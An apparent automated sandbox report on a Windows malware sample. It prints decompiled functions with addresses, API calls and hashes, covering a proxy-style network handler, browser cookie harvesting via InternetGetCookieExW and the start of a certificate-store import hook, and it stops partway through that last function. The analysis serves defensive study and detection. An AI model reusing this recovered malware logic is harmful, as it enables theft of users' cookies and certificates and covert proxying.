Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: dceb885583c91cd30d93c1c8fc8047a2703741ae88f200bb0973aa399b757d27
Instruction ID: 99cde695af1c548967e921fc7cf38363eeec1c85da79b79abb8d2eb26cd208b3
Opcode Fuzzy Hash: dceb885583c91cd30d93c1c8fc8047a2703741ae88f200bb0973aa399b757d27
Instruction Fuzzy Hash: AC31BD76840108FFDF119FA5CC41EEEBBB9BF04344F15852AF550A21A1D33AC996DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00405C3C, Relevance: 6.0, APIs: 4, Instructions: 45
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C3C(void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t3;
				long _t6;
				void* _t11;

				_t1 = E004069FD(_t11, __eflags, 0x5ef893a3, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E00406B23();
					__eflags = _t2;
					if(_t2 != 0) {
						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
						_t6 = WaitForSingleObject( *0x41ea9c, 0x1388);
						while(1) {
							__eflags = _t6 - 0x102;
							if(_t6 != 0x102) {
								goto L6;
							}
							E0040CC7E();
							_t6 = WaitForSingleObject( *0x41ea9c, 0x1388);
						}
					}
					L6:
					E004147B3(_t19);
					_t3 = 0;
					__eflags = 0;
				} else {
					_t3 = _t1 + 1;
				}
				return _t3;
			}

0x00405c4d
0x00405c52
0x00405c56
0x00405c5b
0x00405c60
0x00405c62
0x00405c6d
0x00405c85
0x00405c9c
0x00405c9c
0x00405c9e
0x00000000
0x00000000
0x00405c8e
0x00405c9a
0x00405c9a
0x00405c9c
0x00405ca0
0x00405ca1
0x00405ca6
0x00405ca6
0x00405c58
0x00405c58
0x00405c58
0x00405caf

APIs

Part of subcall function 004069FD: CreateMutexW.KERNEL32(0041E5C8,00000000,?,?,?,?,?), ref: 00406A1E

GetCurrentThread.KERNEL32 ref: 00405C66
SetThreadPriority.KERNEL32(00000000), ref: 00405C6D
WaitForSingleObject.KERNEL32(00001388), ref: 00405C85

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: e581bfc893bbea653cb0bdb389db8dd5afc743dde6bdd4bd8a2fdd60885bed0e
Instruction ID: e04d416062058ce45cc1921cc90ec39bfe2af313d57370e50c660eb4f899b832
Opcode Fuzzy Hash: e581bfc893bbea653cb0bdb389db8dd5afc743dde6bdd4bd8a2fdd60885bed0e
Instruction Fuzzy Hash: 10F08B72108B0D2BE61037A6AD05DAB3B4DDB013A4B200377FD15F22E1DD3A4C0049AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041474D, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041474D(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x00414794
0x004147a0
0x004147a5
0x00000000
0x00000000
0x00414780
0x00414768
0x0041476f
0x0041477a
0x00000000
0x0041477a
0x00000000
0x00414768
0x00414780
0x004147a8
0x004147b0

APIs

PeekMessageW.USER32 ref: 0041478A
MsgWaitForMultipleObjects.USER32 ref: 0041479E

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 5554e2b6e0ea95f983c339fe6b4647c5660ae1ea271065a94402b3840ed51681
Instruction ID: 4d68858f5729d0c37e1defba2941157a47bf3c1af8941c74009f686def8d96ab
Opcode Fuzzy Hash: 5554e2b6e0ea95f983c339fe6b4647c5660ae1ea271065a94402b3840ed51681
Instruction Fuzzy Hash: 75F0FC321043196BD710AA99EC48DA7BB9CEBC63A4F050536F621E31B0D275D9448775

Uniqueness

Uniqueness Score: -1.00%

Function 0041277B, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041277B(void* __ebx, intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t8;
				int _t15;
				void* _t16;

				_t15 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t16 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t16 != _t7) {
					_t8 =  &_v32;
					_push(_t8);
					_push(_t16);
					_v32 = 0x1c;
					asm("in al, 0x1c");
					 *_t8 =  *_t8 + _t8;
					asm("adc eax, 0x40111c");
					while(_t8 != 0) {
						if(_v20 == _a4) {
							_t15 = _t15 + 1;
						}
						_t8 = Thread32Next(_t16,  &_v32);
					}
					CloseHandle(_t16);
					return _t15;
				}
				return _t7;
			}

0x00412783
0x00412788
0x0041278e
0x00412790
0x00412795
0x00412797
0x0041279a
0x0041279b
0x0041279c
0x0041279e
0x004127a0
0x004127a4
0x004127bf
0x004127b1
0x004127b3
0x004127b3
0x004127b9
0x004127b9
0x004127c4
0x00000000
0x004127ca
0x004127cf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00412788
Thread32First.KERNEL32 ref: 004127A3
Thread32Next.KERNEL32 ref: 004127B9
CloseHandle.KERNEL32(00000000), ref: 004127C4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 16776ee72a55afeac2c67f0c79ad5e0892a19a4122a74c0c9a775cf1a7e65ee0
Instruction ID: dcf0eea4b58340055041b579d647c291f78401ceed44068c480e0381407a800f
Opcode Fuzzy Hash: 16776ee72a55afeac2c67f0c79ad5e0892a19a4122a74c0c9a775cf1a7e65ee0
Instruction Fuzzy Hash: 32F0E9355000156BC710AB65DD48DEF7BBCEB85360B000132FA21E21D4D7748841C6F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6A7, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E6A7(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E00414598(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E004140BD(_t61, _t110) != 0) {
					while(E004140BD(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E0040E631(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E004111B9( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E00414123( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E004143DB(_t116, _t127);
									_t84 = E0040E631(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E0041421E(_t110);
									}
									E004143C5(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00414164( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E0040E631(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E004143C5(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E00414395( &_v20,  &_a4);
									_v36 = _t126;
									E004143C5(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E004143DB(_t116, _t126);
										_t110 = _a4;
										_t125 = E0040E631(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E0041421E(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E004140BD(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E00411142( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x0040e6b1
0x0040e6b7
0x0040e6c7
0x0040e6cb
0x0040e6ce
0x0040e6cf
0x0040e6db
0x0040e6ea
0x0040e6e8
0x0040e6ff
0x0040e718
0x0040e726
0x0040e72f
0x0040e7b9
0x0040e7bd
0x0040e7c1
0x0040e8ef
0x00000000
0x0040e8ff
0x0040e7ce
0x0040e7d5
0x0040e7d6
0x0040e7de
0x0040e7df
0x0040e893
0x0040e89d
0x0040e8a5
0x0040e8aa
0x0040e7e8
0x0040e7e8
0x00000000
0x0040e7e8
0x0040e8b1
0x0040e8bd
0x0040e8c5
0x0040e8d2
0x0040e8da
0x0040e8d4
0x0040e8d4
0x0040e8d4
0x0040e8c7
0x0040e8c7
0x0040e8c8
0x0040e8c8
0x0040e8de
0x0040e8e7
0x0040e885
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e8e7
0x0040e7e6
0x0040e7fb
0x0040e7fd
0x0040e803
0x00000000
0x00000000
0x0040e811
0x0040e816
0x0040e86e
0x0040e86e
0x0040e876
0x00000000
0x00000000
0x0040e87f
0x0040e881
0x0040e881
0x00000000
0x0040e87f
0x0040e828
0x0040e82a
0x0040e82d
0x0040e835
0x0040e844
0x0040e84c
0x0040e85c
0x0040e861
0x0040e863
0x0040e866
0x0040e866
0x0040e86b
0x00000000
0x0040e86b
0x0040e837
0x0040e83a
0x00000000
0x0040e83a
0x00000000
0x0040e7e6
0x0040e735
0x0040e737
0x0040e73f
0x0040e748
0x00000000
0x00000000
0x0040e74a
0x0040e74d
0x0040e756
0x0040e76c
0x0040e773
0x0040e776
0x0040e77e
0x0040e786
0x0040e794
0x0040e78f
0x0040e7a7
0x0040e7ac
0x0040e7af
0x0040e7b7
0x00000000
0x00000000
0x00000000
0x0040e7b7
0x0040e791
0x0040e791
0x00000000
0x0040e798
0x0040e780
0x0040e780
0x00000000
0x0040e780
0x0040e758
0x0040e75f
0x00000000
0x00000000
0x00000000
0x0040e761
0x00000000
0x0040e737
0x0040e6e8
0x0040e6ea
0x0040e6dd
0x00000000

APIs

Part of subcall function 00414598: getsockname.WS2_32(?,?,?), ref: 004145B6

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040E776
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0040E7AF

Part of subcall function 004143DB: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004143F1

Part of subcall function 0040E631: getpeername.WS2_32(000000FF,?,?), ref: 0040E655

Part of subcall function 0041421E: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 004142BE

Strings

Z, xrefs: 0040E8E9

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: 6c22615e3939a152a47002da19674d62f6593527b79a6cea2baab981aaea35a5
Instruction ID: d2954e1d3d7df35b8a513ff69a3d8cb79adfcd0cb388beb945f58fe671540fd3
Opcode Fuzzy Hash: 6c22615e3939a152a47002da19674d62f6593527b79a6cea2baab981aaea35a5
Instruction Fuzzy Hash: 99612932E00118AADF20A6B6CC41AEFBBB99F55314F044D7BF911B32C1C67C8956C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041208A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041208A(intOrPtr* __ecx) {
				CHAR* _v5;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				CHAR* _t94;
				void* _t98;
				CHAR* _t103;
				CHAR* _t106;
				CHAR* _t119;
				intOrPtr _t120;
				intOrPtr _t126;
				signed char _t132;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t140;
				CHAR* _t141;
				CHAR* _t142;
				intOrPtr _t143;
				intOrPtr* _t144;

				_t144 = __ecx;
				if(( *(__ecx + 0x1c) & 0x00000010) == 0) {
					_t94 = 0;
					_t142 = 0;
					 *((intOrPtr*)(__ecx + 0x14)) = 0;
					_v20 = 0;
					__eflags =  *(__ecx + 8);
					if( *(__ecx + 8) == 0) {
						L39:
						__eflags =  *(_t144 + 0x1c) & 0x00000001;
						 *(_t144 + 0x18) = _t142;
						if(( *(_t144 + 0x1c) & 0x00000001) == 0) {
							return 1;
						}
						__eflags = _t142 -  *(_t144 + 0x10);
						return 0 | _t142 ==  *(_t144 + 0x10);
					}
					__eflags = 1;
					_v16 = 1;
					_v12 = 1;
					do {
						_t119 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(_t144 + 4))));
						__eflags = _t119 -  *_t144;
						if(_t119 !=  *_t144) {
							__eflags = _t119 -  *((intOrPtr*)(_t144 + 1));
							if(_t119 ==  *((intOrPtr*)(_t144 + 1))) {
								_t120 =  *((intOrPtr*)(_t144 + 8));
								_t126 =  *((intOrPtr*)(_t144 + 1));
								_t140 =  *((intOrPtr*)(_t144 + 4));
								while(1) {
									_t94 = _t94 + 1;
									__eflags = _t94 - _t120;
									if(__eflags >= 0) {
										break;
									}
									__eflags =  *((intOrPtr*)(_t140 + _t94)) - _t126;
									if( *((intOrPtr*)(_t140 + _t94)) == _t126) {
										continue;
									}
									__eflags = _t94 - _t120;
									break;
								}
								if(__eflags != 0) {
									_t98 = E00411142( &_v52, _t144, 0x20);
									_v48 = _v48 + _t98;
									_v44 = _v44 - _t98;
									 *(_t144 + 0x18) = _t142;
									while(1) {
										__eflags = _t142 -  *(_t144 + 0x10);
										if(_t142 >=  *(_t144 + 0x10)) {
											break;
										}
										_v40 =  *((intOrPtr*)(_t144 + 0xc)) + _t142;
										_v36 =  *(_t144 + 0x10) - _t142;
										_t103 = E0041208A( &_v52);
										 *(_t144 + 0x18) = _v28 + _t142;
										__eflags = _t103;
										if(_t103 != 0) {
											L7:
											return 1;
										}
										_t142 =  &(_t142[1]);
										__eflags = _t142;
									}
									L13:
									return 0;
								}
								_t106 =  *(_t144 + 0x10);
								L6:
								 *(_t144 + 0x18) = _t106;
								goto L7;
							}
							__eflags = _t142 -  *(_t144 + 0x10);
							if(_t142 ==  *(_t144 + 0x10)) {
								L12:
								 *(_t144 + 0x18) = _t142;
								goto L13;
							}
							_t141 = _t142[ *((intOrPtr*)(_t144 + 0xc))];
							_t132 =  *(_t144 + 0x1c);
							_v5 = _t141;
							__eflags = _t132 & 0x0000000c;
							if((_t132 & 0x0000000c) == 0) {
								L26:
								__eflags = _t119 - _t141;
								if(_t119 == _t141) {
									goto L38;
								}
								__eflags =  *(_t144 + 0x1c) & 0x00000002;
								if(( *(_t144 + 0x1c) & 0x00000002) == 0) {
									goto L12;
								}
								__eflags = _t119 - 0xa;
								if(_t119 != 0xa) {
									L33:
									__eflags = _t141 - 0xa;
									if(_t141 != 0xa) {
										goto L12;
									}
									__eflags = _t119 - 0xd;
									if(_t119 != 0xd) {
										goto L12;
									}
									__eflags = _v16 -  *((intOrPtr*)(_t144 + 8));
									if(_v16 >=  *((intOrPtr*)(_t144 + 8))) {
										goto L12;
									}
									_t134 =  *((intOrPtr*)(_t144 + 4));
									__eflags =  *((intOrPtr*)(_t134 + _t94 + 1)) - _t141;
									if( *((intOrPtr*)(_t134 + _t94 + 1)) != _t141) {
										goto L12;
									}
									_t94 = _t94 + 1;
									_t60 =  &_v16;
									 *_t60 = _v16 + 1;
									__eflags =  *_t60;
									goto L38;
								}
								__eflags = _t141 - 0xd;
								if(_t141 != 0xd) {
									goto L33;
								}
								__eflags = _v12 -  *(_t144 + 0x10);
								if(_v12 >=  *(_t144 + 0x10)) {
									goto L12;
								}
								_t136 =  *((intOrPtr*)(_t144 + 0xc));
								__eflags =  *((intOrPtr*)(_t136 +  &(_t142[1]))) - _t119;
								if( *((intOrPtr*)(_t136 +  &(_t142[1]))) != _t119) {
									goto L12;
								}
								_t142 =  &(_t142[1]);
								_v12 = _v12 + 1;
								goto L38;
							}
							__eflags = _t132 & 0x00000008;
							if((_t132 & 0x00000008) == 0) {
								_t119 = CharLowerA(_t119);
								_v5 = CharLowerA(_v5);
								_t43 =  &_v20; // 0x407b3d
								_t94 =  *_t43;
								L25:
								_t141 = _v5;
								goto L26;
							}
							__eflags = _t119 - 0x41 - 0x19;
							if(_t119 - 0x41 <= 0x19) {
								_t119 =  &(_t119[0x20]);
								__eflags = _t119;
							}
							__eflags = _t141 - 0x41 - 0x19;
							if(_t141 - 0x41 > 0x19) {
								_v5 = _t141;
								goto L25;
							}
							_t141 =  &(_t141[0x20]);
							goto L26;
						}
						__eflags = _t142 -  *(_t144 + 0x10);
						if(_t142 !=  *(_t144 + 0x10)) {
							goto L38;
						}
						goto L12;
						L38:
						_t142 =  &(_t142[1]);
						_v12 = _v12 + 1;
						_t94 = _t94 + 1;
						_v16 = _v16 + 1;
						_v20 = _t94;
						__eflags = _t94 -  *((intOrPtr*)(_t144 + 8));
					} while (_t94 !=  *((intOrPtr*)(_t144 + 8)));
					goto L39;
				}
				E00411142( &_v52, __ecx, 0x20);
				_v24 = _v24 & 0xffffffef;
				_t143 = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L4:
					 *((intOrPtr*)(_t144 + 0x14)) = 0;
					 *(_t144 + 0x18) = 0;
					goto L13;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_v40 =  *((intOrPtr*)(_t144 + 0xc)) + _t143;
					_v36 =  *(_t144 + 0x10) - _t143;
					if(E0041208A( &_v52) != 0) {
						break;
					}
					_t143 = _t143 + 1;
					if(_t143 <  *(_t144 + 0x10)) {
						continue;
					}
					goto L4;
				}
				_t106 = _v28 + _t143;
				__eflags = _t106;
				 *((intOrPtr*)(_t144 + 0x14)) = _t143;
				goto L6;
			}

0x00412092
0x00412099
0x004120ed
0x004120ef
0x004120f1
0x004120f4
0x004120f7
0x004120fa
0x004121fd
0x004121ff
0x00412203
0x00412206
0x00000000
0x0041227c
0x00412208
0x00000000
0x0041220b
0x00412102
0x00412103
0x00412106
0x00412109
0x0041210c
0x0041210f
0x00412111
0x00412126
0x00412129
0x00412213
0x00412216
0x00412219
0x0041221c
0x0041221c
0x0041221d
0x0041221f
0x00000000
0x00000000
0x00412221
0x00412224
0x00000000
0x00000000
0x00412226
0x00000000
0x00412226
0x00412228
0x00412239
0x0041223e
0x00412241
0x00412244
0x00412272
0x00412272
0x00412275
0x00000000
0x00000000
0x0041224e
0x00412259
0x0041225c
0x00412266
0x00412269
0x0041226b
0x004120e9
0x00000000
0x004120e9
0x00412271
0x00412271
0x00412271
0x0041211f
0x00000000
0x0041211f
0x0041222a
0x004120e6
0x004120e6
0x00000000
0x004120e6
0x0041212f
0x00412132
0x0041211c
0x0041211c
0x00000000
0x0041211c
0x00412137
0x0041213a
0x0041213d
0x00412140
0x00412143
0x00412187
0x00412187
0x00412189
0x00000000
0x00000000
0x0041218b
0x0041218f
0x00000000
0x00000000
0x00412191
0x00412194
0x004121ba
0x004121ba
0x004121bd
0x00000000
0x00000000
0x004121c3
0x004121c6
0x00000000
0x00000000
0x004121cf
0x004121d2
0x00000000
0x00000000
0x004121d8
0x004121db
0x004121df
0x00000000
0x00000000
0x004121e5
0x004121e6
0x004121e6
0x004121e6
0x00000000
0x004121e6
0x00412196
0x00412199
0x00000000
0x00000000
0x0041219e
0x004121a1
0x00000000
0x00000000
0x004121a7
0x004121aa
0x004121ae
0x00000000
0x00000000
0x004121b4
0x004121b5
0x00000000
0x004121b5
0x00412145
0x00412148
0x00412171
0x0041217e
0x00412181
0x00412181
0x00412184
0x00412184
0x00000000
0x00412184
0x0041214d
0x00412150
0x00412152
0x00412152
0x00412152
0x00412158
0x0041215b
0x00412162
0x00000000
0x00412162
0x0041215d
0x00000000
0x0041215d
0x00412113
0x00412116
0x00000000
0x00000000
0x00000000
0x004121e9
0x004121e9
0x004121ea
0x004121ed
0x004121ee
0x004121f1
0x004121f4
0x004121f4
0x00000000
0x00412109
0x004120a2
0x004120a7
0x004120ad
0x004120b2
0x004120d6
0x004120d6
0x004120d9
0x00000000
0x00000000
0x00000000
0x00000000
0x004120b4
0x004120b4
0x004120b9
0x004120c4
0x004120ce
0x00000000
0x00000000
0x004120d0
0x004120d4
0x00000000
0x00000000
0x00000000
0x004120d4
0x004120e1
0x004120e1
0x004120e3
0x00000000

Strings

={@, xrefs: 00412181

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CharLower
String ID: ={@
API String ID: 1615517891-1776635516
Opcode ID: fb06f56fe8d382e4fc9f089d1cdd6c5ca29bf9c98969a3b4cd7765ad7fe4d287
Instruction ID: a0b737034a120b8bfdc852ca50cb0bdd90db9e76b2df4097b5994f60000137bb
Opcode Fuzzy Hash: fb06f56fe8d382e4fc9f089d1cdd6c5ca29bf9c98969a3b4cd7765ad7fe4d287
Instruction Fuzzy Hash: DF618F30A04745AFCB31CF68CA916EABBB2AF15304F14495EC692D3642C3B8A9D5CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040845B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127
networkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040845B(void* __ecx, void* __edx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				char _v12;
				char _v16;
				char _v32;
				char _v52;
				char _v136;
				char _v656;
				void* __edi;
				void* __esi;
				void* _t34;
				void* _t36;
				void* _t41;
				void* _t52;
				void* _t59;
				char* _t61;
				char* _t66;
				void* _t72;
				void* _t73;
				void* _t75;
				intOrPtr* _t78;

				_t73 = __edx;
				_t72 = __ecx;
				if(_a4 == 0) {
					_push(0);
					L17:
					E00411106();
					__eflags = 0;
					return 0;
				}
				_t34 = 0x16;
				_v12 = 0;
				E0040CA33(_t34,  &_v32);
				_t77 =  &_v136;
				_t36 = 0x15;
				E0040CA33(_t36,  &_v136);
				_t41 = E004150D3(0x80000002, _t72,  &_v656, _t77,  &_v32, 0x104);
				if(_t41 != 0 && _t41 != 0xffffffff && (_v656 == 0x38 || _v656 == 0x39)) {
					_v12 = 0x2000;
				}
				E00411106( &_v656);
				E00411106( &_v136);
				E00411106( &_v32);
				_t78 = __imp__InternetGetCookieExW;
				_push(0);
				_push(_v12);
				_push( &_v16);
				_push(0);
				_push(0);
				_push(_a4);
				_v16 = 0;
				if( *_t78() == 0) {
					L15:
					_push(_a4);
					goto L17;
				} else {
					_t50 = _v16;
					if(_v16 <= 0) {
						goto L15;
					}
					_t52 = E004110D6(_t50 + _t50 + 2);
					_push(0);
					_push(_v12);
					_t75 = _t52;
					_push( &_v16);
					_push(_t75);
					_push(0);
					_push(_a4);
					if( *_t78() != 0) {
						_t59 = 8;
						E0040CA33(_t59,  &_v52);
						_t61 = _a8;
						_t91 = _t61;
						if(_t61 == 0) {
							_t61 = "-";
						}
						_push(_t75);
						_push(_t61);
						E004111B9(E00410F70(_t72, _t73, _t91, 0xd, _a4, 0,  &_v52, _a12), 0x420048, 0, 0x104);
						_t66 = E004110D6(0x338);
						if(_t66 != 0) {
							 *_t66 = 0;
							 *((intOrPtr*)(_t66 + 0x32c)) = 0x420048;
							 *((char*)(_t66 + 0x330)) = 0;
							E0041504A(0x420048, 0, E004108E5, _t66);
						}
						E0041508F(0x420048, 0xa);
						E004150B7(0x420048);
					}
					E00411106(_a4);
					E00411106(_t75);
					return 1;
				}
			}

0x0040845b
0x0040845b
0x0040846c
0x004085c5
0x004085c6
0x004085c6
0x004085cb
0x00000000
0x004085cb
0x00408477
0x00408478
0x0040847b
0x00408482
0x00408488
0x00408489
0x004084a5
0x004084ac
0x004084c7
0x004084c7
0x004084d5
0x004084e1
0x004084ea
0x004084ef
0x004084f5
0x004084f6
0x004084fc
0x004084fd
0x004084fe
0x004084ff
0x00408502
0x00408509
0x004085c0
0x004085c0
0x00000000
0x0040850f
0x0040850f
0x00408514
0x00000000
0x00000000
0x0040851e
0x00408523
0x00408524
0x00408527
0x0040852c
0x0040852d
0x0040852e
0x0040852f
0x00408536
0x0040853d
0x0040853e
0x00408543
0x00408546
0x00408548
0x0040854a
0x0040854a
0x0040854f
0x00408550
0x00408572
0x0040857c
0x00408583
0x0040858c
0x0040858e
0x00408594
0x0040859a
0x0040859a
0x004085a3
0x004085a8
0x004085a8
0x004085b0
0x004085b6
0x00000000
0x004085bd

APIs

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

InternetGetCookieExW.WININET(?,00000000,00000000,?,?,00000000), ref: 00408505
InternetGetCookieExW.WININET(?,00000000,00000000,?,?,00000000), ref: 00408532

Strings

9, xrefs: 004084BD

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CookieInternet$Open
String ID: 9
API String ID: 237861858-2366072709
Opcode ID: f3c2c8495630261d90ac5f172b2135dfb06dd0af71d1d3bbc4b071dbdb3cd83c
Instruction ID: e11632ff6d069cd30ea1fdf7572d247407de1a076a13a24f3a3cb66a3e9c5970
Opcode Fuzzy Hash: f3c2c8495630261d90ac5f172b2135dfb06dd0af71d1d3bbc4b071dbdb3cd83c
Instruction Fuzzy Hash: 19419471D00219BADF10ABA5CC85EEE7B7CAB04344F10447BB644F7191DB789A85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00407781, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00407781(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00406B23() != 0) {
